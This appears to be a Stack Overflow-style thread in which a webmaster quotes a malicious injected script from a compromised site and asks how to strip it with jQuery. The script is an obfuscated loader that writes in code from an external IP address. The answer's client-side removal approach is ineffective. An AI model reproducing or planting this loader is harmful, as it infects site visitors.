# Remove a script from hundreds of pages with jquery

Tags: jquery

I have the same injected script on many pages on my site. I need to remove it from all those pages. This one:

```
<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->
```

I know that I can do this with the jquery and my code would resemble this one:

```
<script>
$( document ).ready(function() {
    $('iframe').remove();
});
</script>
```

But I guess I need to insert something different instead of "iframe" or somehow modify it because it didn't work for me.

Comment: Surely it would be better to find out how and why the script is getting injected in the first place?

Comment: Yes, I have removed all infected files, or allmost all, changed passwords and deleted new strange users and unblocked my site. Now remained only these scripts, Yandex bogging me now because of them.

Comment: Can you not restore from a backup instead? Manually cleaning up an infected site doesn't sound like a good idea, and removing malicious script files with JavaScript _after_ they've been loaded on the page is not the way to do it.

Comment: This right backup is in a long way in the past and I don't know the date even. Since then a lot of content has been added notwithstanding site slowness. It was wrong, I know.

Answer (score 0):

This should help you removing the script:

```
<script type="text/javascript">
    $(document).ready(function () {
        $("script").each(function () {
            if (this.innerHTML.length > 0) {
                if(checkCondition){ // use a regex to verify if right script
                   $(this).remove();
                 }

            }
        });
    });

</script>
```

Comment: I have pasted your code as is, reloaded in different browsers but those scripts are still on the pages, sorry.

Comment: you need to update `checkCondition` to use your condition for detecting the right script. May be use a Regex

Comment: Sorry, didn't know, I'm not savvy in the code, may be you could tell me what it could be like this Regex?